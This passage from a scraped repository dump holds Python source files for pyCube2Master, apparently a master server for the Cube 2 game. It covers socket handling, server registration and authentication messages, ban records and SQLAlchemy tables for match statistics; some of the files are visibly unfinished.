ServersModel import ServersModel\nfrom PunitiveModel import PunitiveModel\nfrom StatsModel import StatsModel\nfrom SocketManager import SocketManager\n\nclass Controller(object):\n def __init__(self, master_ip, master_port, max_clients):\n \n self.authentication_model = AuthenticationModel()\n self.servers_model = ServersModel()\n self.punitive_model = PunitiveModel()\n self.stats_model = StatsModel()\n self.socket_manager = SocketManager(master_ip, master_port, max_clients)\n \n 
#######################################\n #connect up our signals\n #######################################\n \n #SocketManager\n \n self.socket_manager.started.connect(self.on_started)\n self.socket_manager.stopped.connect(self.on_stopped)\n self.socket_manager.connect.connect(self.on_connect)\n self.socket_manager.request.connect(self.on_request)\n self.socket_manager.disconnect.connect(self.on_disconnect)\n \n #ServersModel\n \n self.servers_model.challenge.connect(self.on_challenge)\n self.servers_model.accept.connect(self.on_accept)\n self.servers_model.deny.connect(self.on_deny)\n \n #AuthenticationModel\n \n self.authentication_model.challenge.connect(self.on_auth_challenge)\n self.authentication_model.accept.connect(self.on_auth_accept)\n self.authentication_model.deny.connect(self.on_auth_deny)\n \n #PunitiveModel\n \n self.punitive_model.update.connect(self.on_punitive_effect_update)\n self.punitive_model.remove.connect(self.on_punitive_effect_remove)\n \n #######################################\n #start up the socket_manager\n #######################################\n \n self.socket_manager.run()\n \n def on_started(self, ip, port):\n print \"Master server started.\"\n print \"Listening on (%s, %s).\" %(str(ip), str(port))\n print \"Press Ctrl-c to exit.\"\n \n def on_stopped(self):\n print \"\\nMaster server stopped.\"\n \n def on_connect(self, client):\n print \"client connected %s\" % str(client.address)\n \n def on_request(self, client, data):\n print \"client request %s:\" % str(client.address), data\n \n \"\"\"\n #inbound messages\n \n list = list servers\n sr = server registration\n sc = server confirmation\n \n ar = authentication request\n ac = authentication confirmation\n \n eu = effect update\n er = effect remove\n \n sd = stats data\n \n #outbound messages\n \n rc = registration challenge\n rs = registration success\n rf = registration failure\n \n ac = authentication challenge\n as = authentication success\n af = authentication failure\n \n na = names add\n nr = names remove\n \n eu = effect update\n er = effect remove\n \"\"\"\n \n if data[0] == \"list\":\n servers_list = self.servers_model.get_server_list()\n client.send(servers_list)\n if data[0] == \"sr\":\n self.servers_model.register_server(client, data[1], data[2])\n elif data[0] == \"sc\":\n self.servers_model.confirm_server(client, data[1])\n elif not self.servers_model.is_server_confirmed(client):\n client.disconnect()\n return\n else:\n if data[0] == \"ar\":\n self.authentication_model.request_authentication(client, data[1], data[2])\n elif data[0] == \"ac\":\n self.authentication_model.confirm_authentication(client, data[1], data[2])\n elif data[0] == \"ec\":\n self.punitive_model.create_effect(client, *data[1:])\n elif data[0] == \"sd\":\n self.punitive_model.add_data(client, data)\n \n def on_disconnect(self, client):\n print \"client disconnected %s\" % str(client.address)\n \n def on_challenge(self, client, challenge):\n message = \"rc %s\\n\" % challenge\n client.send(message)\n \n def on_accept(self, client):\n client.unlimit()\n effect_list = self.punitive_model.get_effect_list()\n names_list = self.authentication_model.get_name_list()\n message = \"\".join((\"rs\\n\", effect_list, names_list))\n client.send(message)\n \n def on_deny(self, client):\n client.send(\"rf\\n\")\n client.disconnect()\n \n def on_auth_challenge(self, client, authid, challenge):\n message = \"ac %s %s\\n\" % (authid, challenge)\n client.send(message)\n \n def on_auth_accept(self, client, authid, userid, groups, names):\n 
message = \"as %d %d %s %s\\n\" % (authid, userid, ','.join(groups), ','.join(names))\n client.send(message)\n \n def on_auth_deny(self, client, authid):\n message = \"af %s\\n\" % authid\n client.send(message)\n \n def on_punitive_effect_update(self, effect_id, effect_type, target_ip, target_mask, reason):\n message = \"eu %d %d %s %s %s\\n\" % (effect_id, effect_type, target_ip, target_mask, reason)\n self.servers_model.broadcast(message)\n \n def on_punitive_effect_remove(self, effect_id):\n message = \"er %d\\n\" % effect_id\n self.server_model.broadcast(message)\n \n" }, { "alpha_fraction": 0.526099681854248, "alphanum_fraction": 0.5319648385047913, "avg_line_length": 30.58333396911621, "blob_id": "a2e1a1b4a62450e7be3d00a23dba12704745bd35", "content_id": "0e529e3f26336b7cc57d0147a0d98f695bba557a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3410, "license_type": "no_license", "max_line_length": 82, "num_lines": 108, "path": "/src/SocketManager.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "import socket\nimport select\nimport time\n\nfrom Signals import SignalObject, Signal\n\nclass MasterClient(object):\n def __init__(self, socket_manager, sock, address):\n self.socket_manager = socket_manager\n self.address = address\n self.socket = sock\n \n #limit the buffer to 128 characters until they have been authenticated\n self.buffer_limit = 128\n \n self.buffer = \"\"\n \n def unlimit(self):\n self.buffer_limit = -1\n \n def send(self, datum):\n self.socket.send(datum)\n \n def disconnect(self):\n self.socket_manager.handle_disconnect(self.socket)\n self.socket_manager.disconnect.emit(self)\n self.socket.close()\n \n def handle(self):\n data = self.socket.recv(1024)\n if len(data) <= 0:\n self.disconnect()\n return\n self.buffer += data\n \n if self.buffer_limit != -1 and len(self.buffer) > self.buffer_limit:\n self.disconnect()\n return\n \n next_nl_pos = self.buffer.find(\"\\n\")\n while next_nl_pos != -1:\n datum, self.buffer = self.buffer.split('\\n', 1)\n self.handle_datum(datum)\n next_nl_pos = self.buffer.find(\"\\n\")\n \n def handle_datum(self, datum):\n datum = datum.split()\n self.socket_manager.request.emit(self, datum)\n\nclass SocketManager(SignalObject):\n \n started = Signal\n stopped = Signal\n update = Signal\n connect = Signal\n request = Signal\n disconnect = Signal\n\n def __init__(self, master_ip, master_port, max_clients):\n SignalObject.__init__(self)\n \n self.master_clients = {}\n \n self.master_ip = master_ip\n self.master_port = master_port\n \n self.running = True\n self.interval = 3800\n self.next_update = time.time() + self.interval\n \n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.socket.bind((master_ip, master_port))\n self.socket.listen(max_clients)\n \n def run(self):\n self.started.emit(self.master_ip, self.master_port)\n try:\n while self.running:\n if time.time() >= self.next_update:\n self.update.emit()\n self.next_update = time.time() + self.interval\n \n wait_time = self.next_update - time.time()\n \n wait_devs = [self.socket] + self.master_clients.keys()\n \n try:\n rfds, wfds, efds = select.select(wait_devs, [], [], wait_time)\n \n for rfd in rfds:\n if rfd == self.socket:\n self.handle_connect()\n else:\n self.master_clients[rfd].handle()\n \n except select.error:\n pass\n except KeyboardInterrupt:\n self.stopped.emit()\n \n def handle_connect(self):\n sock, 
address = self.socket.accept()\n self.master_clients[sock] = MasterClient(self, sock, address)\n self.connect.emit(self.master_clients[sock])\n\n def handle_disconnect(self, sock):\n del self.master_clients[sock]" }, { "alpha_fraction": 0.526868462562561, "alphanum_fraction": 0.526868462562561, "avg_line_length": 40.512821197509766, "blob_id": "178e934d7c7b5ffa5a070b1237ea335529a8d81b", "content_id": "25b26aa1bab52e1c728f6ffc689e2a0de2cfded5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3238, "license_type": "no_license", "max_line_length": 201, "num_lines": 78, "path": "/src/PunitiveModel.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "\"\"\"Clients only keep the current list of active effects.\"\"\"\n\nimport datetime\nfrom Signals import SignalObject, Signal\n\nfrom DatabaseManager import Session\n\nfrom BaseTables import PunitiveEffect, PunitiveEffectType\n\nclass PunitiveModel(SignalObject):\n\n update = Signal\n remove = Signal\n\n def __init__(self):\n SignalObject.__init__(self)\n \n self.effect_list = \"\"\n self.effect_list_dirty = True\n \n def create_effect(self, server, effect_type_name, target_id, target_name, target_ip, target_mask, \n master_id, master_name, master_ip, reason):\n \"\"\"Create an entry for a new specified punitive effect.\"\"\"\n \n effect_type = EffectType.by_name(effect_type_name)\n \n if effect_type is None:\n return\n \n self.effects[effect_id] = PunitiveEffect( effect_type, \n target_id, \n target_name, \n target_ip, \n target_mask, \n master_id, \n master_name, \n master_ip, \n reason)\n \n self.effect_list_dirty = True\n self.update.emit(effect_id, effect_type.name, target_ip, target_mask, reason)\n \n def remove_effect(self, effect_id):\n if PunitiveEffect.expire(effect_id):\n self.effect_list_dirty = True\n self.remove.emit(effect_id)\n \n def get_effect_list(self):\n if self.effect_list_dirty:\n effect_list_list = []\n \n with Session() as session:\n punitive_effect_query = session.query(PunitiveEffect.id, PunitiveEffect.effect_type, PunitiveEffect.expired, PunitiveEffect.target_ip, PunitiveEffect.target_mask, PunitiveEffect.reason)\n rows = punitive_effect_query.filter(PunitiveEffect.expired==False).all()\n \n for effect_id, effect_type, expired, target_ip, target_mask, reason in rows:\n effect_type_name = effect_type.name\n effect_val = \"ue %ld %s %ld %ld %s\\n\" % (effect_id, effect_type_name, target_ip, target_mask, reason)\n effect_list_list.append(effect_val)\n \n self.effect_list = \"\".join(effect_list_list)\n self.effect_list_dirty = False\n \n return self.effect_list\n \n def refresh(self):\n \"Look for those effects which have expired and send out remove signals.\"\n with Session() as session:\n punitive_effect_query = session.query(PunitiveEffect)\n punitive_effect_query = PunitiveEffect.expired(punitive_effect_query)\n \n expired_punitive_effects = punitive_effect_query.all()\n \n for punitive_effect in expired_punitive_effects:\n punitive_effect.expired = True\n self.remove.emit(punitive_effect.id)\n \n session.commit()\n" }, { "alpha_fraction": 0.6979472041130066, "alphanum_fraction": 0.7008797526359558, "avg_line_length": 33.150001525878906, "blob_id": "f620c53ea9849913caa55d57413546a44a55012c", "content_id": "f1d42c6a841719e8a07879ba1789ec263a2028b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 682, "license_type": "no_license", "max_line_length": 73, "num_lines": 20, "path": 
"/src/BaseTables/Common.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from DatabaseManager import database_manager, Session\n\nfrom sqlalchemy import or_\nfrom sqlalchemy import SmallInteger, Integer, BigInteger, String, Boolean\nfrom sqlalchemy import DateTime\nfrom sqlalchemy import Column, Sequence, ForeignKey\n\nfrom sqlalchemy.orm.exc import NoResultFound, MultipleResultsFound\nfrom sqlalchemy.orm import relation, mapper, relationship, backref\nfrom sqlalchemy.schema import UniqueConstraint\n\nclass enum(object):\n def __init__(self, *items, **kwitems):\n i = 0\n for item in items:\n self.__setattr__(item, i)\n i += 1\n \n for item, value in kwitems.items():\n self.__setattr__(item, value)" }, { "alpha_fraction": 0.6745152473449707, "alphanum_fraction": 0.6745152473449707, "avg_line_length": 41.52941131591797, "blob_id": "32378ecbb430889c9fd29b0a6da5b55010cb77c9", "content_id": "887d35e582f4ab382d0b9b4e90bd2078213709a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 722, "license_type": "no_license", "max_line_length": 90, "num_lines": 17, "path": "/src/BaseTables/UserGroupMembership.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass UserGroupMembership(database_manager.Base):\n __tablename__ = table_names['UserGroupMembership']\n id = Column(Integer, Sequence(__tablename__+'_id_seq'), primary_key=True)\n user_id = Column(Integer, ForeignKey(table_names['User']+'.id'), nullable=False)\n group_id = Column(Integer, ForeignKey(table_names['UserGroup']+'.id'), nullable=False)\n \n UniqueConstraint(user_id, group_id, name=__tablename__+'_uq_user_id_group_id')\n \n user = relationship('User', back_populates=\"group_memberships\")\n group = relationship('UserGroup')\n \n def __init__(self, user_id, group_id):\n self.user_id = user_id\n self.name = group_id" }, { "alpha_fraction": 0.6274510025978088, "alphanum_fraction": 0.6318082809448242, "avg_line_length": 40.818180084228516, "blob_id": "3764a3efdd0895ff54bb3a4aabbe5c6f59dd34d7", "content_id": "be2eb8881b4613f0d4307b2e0a229a3b948711fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 459, "license_type": "no_license", "max_line_length": 107, "num_lines": 11, "path": "/src/BaseTables/PseudoMode.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass PseudoMode(database_manager.Base):\n __tablename__ = table_names['PseudoMode']\n id = Column(Integer, Sequence(__tablename__+'_id_seq'), primary_key=True)\n \n mod_id = Column(Integer, ForeignKey(table_names['ServerMod']+'.id'), nullable=False)\n \n name = Column(String(32), nullable=False)\n number = Column(SmallInteger, nullable=False)" }, { "alpha_fraction": 0.7807999849319458, "alphanum_fraction": 0.7807999849319458, "avg_line_length": 33.72222137451172, "blob_id": "49dd9f9f4dac707f3720f5f8622150ded5d883c9", "content_id": "8e1e6d81aa252b700b7795059c9b983184408d23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 625, "license_type": "no_license", "max_line_length": 91, "num_lines": 18, "path": "/src/StatsModel.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Signals import SignalObject, Signal\n\nfrom DatabaseManager import database_manager, Session\nfrom 
sqlalchemy import or_\nfrom sqlalchemy import Column, SmallInteger, Integer, BigInteger, String, Boolean, DateTime\nfrom sqlalchemy import Sequence, ForeignKey\nfrom sqlalchemy.orm.exc import NoResultFound, MultipleResultsFound\nfrom sqlalchemy.orm import relation, mapper, relationship, backref\nfrom sqlalchemy.schema import UniqueConstraint\n\ndatabase_manager.initialize_tables()\n\nclass StatsModel(SignalObject):\n def __init__(self):\n SignalObject.__init__(self)\n \n def add_data(client, data):\n pass\n" }, { "alpha_fraction": 0.6584615111351013, "alphanum_fraction": 0.6646153926849365, "avg_line_length": 31.600000381469727, "blob_id": "4b8a429de843565d9920368bca5c9a465ace87cd", "content_id": "5cc26cde26c78a9eb966f0f87b796926b6df0838", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 325, "license_type": "no_license", "max_line_length": 77, "num_lines": 10, "path": "/src/BaseTables/UserGroup.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass UserGroup(database_manager.Base):\n __tablename__ = table_names['UserGroup']\n id = Column(Integer, Sequence(__tablename__+'_id_seq'), primary_key=True)\n name = Column(String(48), nullable=False)\n \n def __init__(self, name):\n self.name = name" }, { "alpha_fraction": 0.6262376308441162, "alphanum_fraction": 0.6311880946159363, "avg_line_length": 39.5, "blob_id": "b409e4fc8e1251f570ea251ca6d475df53ad3910", "content_id": "fdecdae3c433f1edf0fc83aa75bbf252488cd82d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 404, "license_type": "no_license", "max_line_length": 77, "num_lines": 10, "path": "/src/BaseTables/Gun.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass Gun(database_manager.Base):\n __tablename__ = table_names['Gun']\n id = Column(Integer, Sequence(__tablename__+'_id_seq'), primary_key=True)\n \n number = Column(SmallInteger, nullable=False, index=True)\n name = Column(String(16), nullable=False)\n damage = Column(Integer, nullable=False)" }, { "alpha_fraction": 0.6145404577255249, "alphanum_fraction": 0.6172839403152466, "avg_line_length": 33.761905670166016, "blob_id": "3f19affa5985c090662dac9213095dee53d803e8", "content_id": "7dbe25a35f943b300051eb043d4b7a5172fff1f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 729, "license_type": "no_license", "max_line_length": 99, "num_lines": 21, "path": "/src/BaseTables/UserName.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass UserName(database_manager.Base):\n __tablename__ = table_names['UserName']\n id = Column(Integer, Sequence(__tablename__ + '_id_seq'), primary_key=True)\n user_id = Column(BigInteger, ForeignKey(table_names['User']+'.id'), nullable=False)\n name = Column(String(16), nullable=False)\n \n UniqueConstraint(name, name=__tablename__+'_uq_name')\n \n user = relationship('User', back_populates=\"names\")\n \n def __init__(self, user_id, name):\n self.user_id = user_id\n self.name = name\n \n @staticmethod\n def all_names():\n with Session() as session:\n return session.query(UserName.name).all()" }, { "alpha_fraction": 0.647948145866394, "alphanum_fraction": 0.6522678136825562, "avg_line_length": 34.653846740722656, 
"blob_id": "beed3670ef82acfb67161e13394c9be73a4190bf", "content_id": "9535dd2d7628168f84d164a4e8f1001495d1619a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 926, "license_type": "no_license", "max_line_length": 92, "num_lines": 26, "path": "/src/BaseTables/PunitiveEffectType.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass PunitiveEffectType(database_manager.Base):\n __tablename__ = table_names['PunitiveEffectType']\n id = Column(Integer, Sequence(__tablename__+'_id_seq'), primary_key=True)\n name = Column(String(16))\n default_expiry_type = Column(Integer)\n default_duration = Column(BigInteger)\n \n expiry_types = enum(NEVEREXPIRES=-1, EXPIRYDATE=0)\n \n UniqueConstraint(name, name=__tablename__+'_uq_name')\n \n def __init__(self, name, default_expiry_type, default_duration):\n self.name = name\n self.default_expiry_type = default_expiry_type\n self.default_duration = default_duration\n \n @staticmethod\n def by_name(name):\n try:\n with Session() as session:\n return session.query(EffectType).filter(PunitiveEffectType.name==name).one()\n except NoResultFound:\n return None" }, { "alpha_fraction": 0.6086350679397583, "alphanum_fraction": 0.6142061352729797, "avg_line_length": 31.68181800842285, "blob_id": "7c6e423edc2d15d41b5d12eb155a9a45c43ba46d", "content_id": "ee03b3147411667b9b213e235fcbacfefd5e3d1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 718, "license_type": "no_license", "max_line_length": 90, "num_lines": 22, "path": "/src/BaseTables/ServerDomain.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass ServerDomain(database_manager.Base):\n __tablename__ = table_names['ServerDomain']\n id = Column(Integer, Sequence(__tablename__+'_id_seq'), primary_key=True)\n name = Column(String(64), index=True)\n pubkey = Column(String(49))\n \n UniqueConstraint(name, name=__tablename__+'_uq_name')\n \n def __init__(self, name, pubkey):\n self.name = name\n self.pubkey = pubkey\n \n @staticmethod\n def by_domain(domain):\n with Session() as session:\n try:\n return session.query(ServerDomain).filter(ServerDomain.name==domain).one()\n except NoResultFound:\n return None" }, { "alpha_fraction": 0.6514459848403931, "alphanum_fraction": 0.6514459848403931, "avg_line_length": 49.61538314819336, "blob_id": "49dd11ed58e4579a8ab449fd15debd6f50180f5e", "content_id": "4cb21e835a5007eefc68311a3c3e33d2b52d3f0e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 657, "license_type": "no_license", "max_line_length": 98, "num_lines": 13, "path": "/src/BaseTables/DamageDealtEvent.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass DamageDealtEvent(database_manager.Base):\n __tablename__ = table_names['DamageDealtEvent']\n id = Column(BigInteger, Sequence(__tablename__ + '_id_seq'), primary_key=True)\n \n match_id = Column(BigInteger, ForeignKey(table_names['Match']+'.id'), nullable=False)\n target = Column(BigInteger, ForeignKey(table_names['User']+'.id'), nullable=False)\n shot = Column(BigInteger, ForeignKey(table_names['ShotEvent']+'.id'),nullable=False)\n \n when = Column(DateTime, nullable=False)\n distance = Column(Integer, nullable=False)" 
}, { "alpha_fraction": 0.647230327129364, "alphanum_fraction": 0.6511175632476807, "avg_line_length": 48.0476188659668, "blob_id": "5e4adaef92f46cb58cee105b19df2b5c40b6651e", "content_id": "9be1b395ec2c80caa3ccb2ba8cbd512979cd2dbd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1029, "license_type": "no_license", "max_line_length": 98, "num_lines": 21, "path": "/src/BaseTables/FragEvent.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass FragEvent(database_manager.Base):\n __tablename__ = table_names['FragEvent']\n id = Column(BigInteger, Sequence(__tablename__+'_id_seq'), primary_key=True)\n \n who_id = Column(BigInteger, ForeignKey(table_names['User']+'.id'), nullable=False)\n match_id = Column(BigInteger, ForeignKey(table_names['Match']+'.id'), nullable=False)\n shot_id = Column(BigInteger, ForeignKey(table_names['ShotEvent']+'.id'),nullable=False)\n target_id = Column(BigInteger, ForeignKey(table_names['User']+'.id'), nullable=True)\n \n when = Column(DateTime, nullable=False)\n type = Column(SmallInteger, nullable=False)\n \n types = enum(NORMAL=0, TEAMKILL=1, BOT=2, SPAWNKILL=3)\n \n who = relationship('User', primaryjoin=\"User.id==FragEvent.who_id\")\n match = relationship('Match')\n shot = relationship('ShotEvent')\n target = relationship('User', primaryjoin=\"User.id==FragEvent.target_id\")" }, { "alpha_fraction": 0.6066176295280457, "alphanum_fraction": 0.6066176295280457, "avg_line_length": 57.35714340209961, "blob_id": "6ead4badbcb25243574233df0b47ba284bbd3f62", "content_id": "0e373b6851feeb8a5ac18ee7624b1cf034d619bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 816, "license_type": "no_license", "max_line_length": 115, "num_lines": 14, "path": "/src/BaseTables/Match.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass Match(database_manager.Base):\n __tablename__ = table_names['Match']\n id = Column(BigInteger, Sequence(__tablename__+'_id_seq'), primary_key=True)\n \n mode_id = Column(SmallInteger, ForeignKey(table_names['Mode']+'.id'), nullable=False)\n pseudomode_id = Column(SmallInteger, ForeignKey(table_names['PseudoMode']+'.id'), nullable=False)\n server_id = Column(Integer, ForeignKey(table_names['ServerInstance']+'.id'), nullable=False)\n game_version_id = Column(Integer, ForeignKey(table_names['GameVersion']+'.id'), nullable=False)\n \n start = Column(DateTime, nullable=False)\n end = Column(DateTime, nullable=False)" }, { "alpha_fraction": 0.6391891837120056, "alphanum_fraction": 0.6391891837120056, "avg_line_length": 51.92856979370117, "blob_id": "7094e6bed74824c28f194000ab5d48c328bb33f4", "content_id": "0448585020fd5a7016a5d7bd06419619b4639bc1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 740, "license_type": "no_license", "max_line_length": 98, "num_lines": 14, "path": "/src/BaseTables/DeathEvent.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass DeathEvent(database_manager.Base):\n __tablename__ = table_names['DeathEvent']\n id = Column(BigInteger, Sequence(__tablename__+'_id_seq'), primary_key=True)\n \n who = Column(BigInteger, ForeignKey(table_names['User']+'.id'), nullable=False)\n match_id = 
Column(BigInteger, ForeignKey(table_names['Match']+'.id'), nullable=False)\n killer = Column(BigInteger, ForeignKey(table_names['User']+'.id'), nullable=True)\n shot = Column(BigInteger, ForeignKey(table_names['ShotEvent']+'.id'),nullable=True)\n \n when = Column(DateTime, nullable=False)\n type = Column(SmallInteger, nullable=False)" }, { "alpha_fraction": 0.6250928044319153, "alphanum_fraction": 0.6288047432899475, "avg_line_length": 35.43243408203125, "blob_id": "2a32c89597aa33d5a3277e3d11e4766fbafb4b80", "content_id": "c43d83b8a4d9438648ed1fd597a24c6227c8f7fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1347, "license_type": "no_license", "max_line_length": 119, "num_lines": 37, "path": "/src/BaseTables/User.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass User(database_manager.Base):\n __tablename__ = table_names['User']\n id = Column(Integer, Sequence(__tablename__ + '_id_seq'), primary_key=True)\n email = Column(String(128), index=True)\n pubkey = Column(String(49), nullable=False)\n approved = Column(Boolean)\n \n UniqueConstraint(email, name=__tablename__+'_uq_email')\n \n names = relationship('UserName', order_by='UserName.id', back_populates=\"user\")\n group_memberships = relationship('UserGroupMembership', order_by='UserGroupMembership.id', back_populates=\"user\")\n \n def __init__(self, email, pubkey):\n self.email = email\n self.pubkey = pubkey\n self.approved = True\n \n @property\n def name_list(self):\n with Session() as session:\n return session.query('UserName.name').filter('UserName.user_id'==self.id).all()\n \n @property\n def group_list(self):\n with Session() as session:\n return session.query('UserGroupMembership.group.name').filter('UserGroupMembership.user_id'==self.id).all()\n \n @staticmethod\n def by_email(email):\n try:\n with Session() as session:\n return session.query(User).filter(User.email==email).one()\n except NoResultFound:\n return None" }, { "alpha_fraction": 0.6060606241226196, "alphanum_fraction": 0.6075757741928101, "avg_line_length": 51.84000015258789, "blob_id": "e6b8479bc58f9be6dd3a7b3451dd07e4c932609e", "content_id": "0f9c3f1c6803c8c6842ccbad84667d33f72dcf6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1320, "license_type": "no_license", "max_line_length": 135, "num_lines": 25, "path": "/src/BaseTables/ServerInstance.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass ServerInstance(database_manager.Base):\n __tablename__ = table_names['ServerInstance']\n id = Column(Integer, Sequence(__tablename__+'_id_seq'), primary_key=True)\n \n domain_id = Column(SmallInteger, ForeignKey(table_names['ServerDomain']+'.id'), nullable=False)\n game_id = Column(SmallInteger, ForeignKey(table_names['Game']+'.id'), nullable=False)\n mod_id = Column(SmallInteger, ForeignKey(table_names['ServerMod']+'.id'), nullable=False)\n \n name = Column(String(32), nullable=False)\n port = Column(Integer, nullable=False)\n \n domain = relationship('ServerDomain', backref=backref('instances', order_by=id))\n game = relationship('Game', backref=backref('server_instances', order_by=id))\n mod = relationship('ServerMod', backref=backref('server_instances', order_by=id))\n \n @staticmethod\n def by_domain_port(domain, port):\n with Session() as session:\n try:\n 
return session.query(ServerInstance).filter(ServerInstance.domain.name==domain).filter(ServerInstance.port==port).one()\n except NoResultFound:\n return None" }, { "alpha_fraction": 0.5552918910980225, "alphanum_fraction": 0.5552918910980225, "avg_line_length": 28.26388931274414, "blob_id": "c92153e304452b28309c17a41a27261919f8bb5e", "content_id": "6a69bacfb90328cb52a16689c5c78906e7b68b1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2107, "license_type": "no_license", "max_line_length": 74, "num_lines": 72, "path": "/src/Signals.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "\"\"\"\nAn extremely simple synchonous signal/slot handler system.\n\"\"\"\n\nclass Signal(object):\n def __init__(self):\n self.slots = []\n \n def connect(self, slot):\n if not slot in self.slots:\n self.slots.append(slot)\n \n def disconnect(self, slot):\n if slot in self.slots:\n self.slots.remove(slot)\n \n def emit(self, *args):\n for slot in self.slots:\n slot(*args)\n\nclass SignalObject(object):\n def __init__(self):\n \"Initialize each attribute signal.\"\n for key in dir(self):\n val = self.__getattribute__(key)\n if type(val) == type and issubclass(val, Signal):\n self.__setattr__(key, Signal())\n \nimport unittest\n\nclass TestSignals(unittest.TestCase):\n\n class TestListModel(SignalObject):\n \n update = Signal\n \n def __init__(self):\n SignalObject.__init__(self)\n self.data_list = []\n\n def add(self, datum):\n self.data_list.append(datum)\n self.update.emit(self.data_list[:])\n \n class TestListView(object):\n def __init__(self, model):\n self.model = model\n self.model.update.connect(self.on_model_update)\n self.data_cache = []\n \n def on_model_update(self, data_list):\n self.data_cache = data_list\n\n def setUp(self):\n self.test_model = self.TestListModel()\n self.test_view = self.TestListView(self.test_model)\n\n def test_signals(self):\n self.test_model.add('foo')\n self.assertEqual(self.test_view.data_cache, ['foo'])\n self.test_model.add('bar')\n self.assertEqual(self.test_view.data_cache, ['foo', 'bar'])\n self.test_model.add('baz')\n self.assertEqual(self.test_view.data_cache, ['foo', 'bar', 'baz'])\n \n self.test_model.update.disconnect(self.test_view.on_model_update)\n \n self.test_model.add('zan')\n self.assertEqual(self.test_view.data_cache, ['foo', 'bar', 'baz'])\n\nif __name__ == '__main__':\n unittest.main()\n" }, { "alpha_fraction": 0.5954598188400269, "alphanum_fraction": 0.5980791449546814, "avg_line_length": 41.432098388671875, "blob_id": "8b67742447b3a754a644c1650ed931c0223b1442", "content_id": "1266a2dfa782b3e7062a631f0ebf87ea963f8230", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3436, "license_type": "no_license", "max_line_length": 111, "num_lines": 81, "path": "/src/BaseTables/PunitiveEffect.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass PunitiveEffect(database_manager.Base):\n __tablename__ = table_names['PunitiveEffect']\n id = Column(BigInteger, Sequence(__tablename__+'_id_seq'), primary_key=True)\n effect_type_id = Column(Integer, ForeignKey(table_names['PunitiveEffectType']+'.id'), nullable=False)\n \n target_id = Column(BigInteger, ForeignKey(table_names['User']+'.id'), nullable=True)\n target_ip = Column(BigInteger, nullable=False, index=True)\n target_mask = Column(BigInteger, nullable=False, index=True)\n 
